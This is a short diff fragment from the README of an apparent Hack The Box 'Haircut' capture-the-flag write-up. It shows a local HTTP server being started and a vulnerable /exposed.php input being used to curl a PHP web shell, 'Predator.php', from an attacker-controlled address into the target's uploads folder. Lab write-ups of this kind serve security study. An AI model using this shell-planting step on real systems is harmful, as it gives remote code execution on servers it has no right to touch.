notsag-dev/htb-haircut/README.md

 Serving HTTP on 0.0.0.0 port 8000 ...
 ```

-And now from the input in /exposed.php we curl it to uploads leveraging the `-o` (output file) flag:
+And now from the input in `/exposed.php` we curl it to uploads leveraging the `-o` (output file) flag (this time without the trick to execute commands from the input as we are just using curl as it is to fetch the shell):
 ```
 10.10.14.23:8000/Predator.php -o uploads/Predator.php
 ```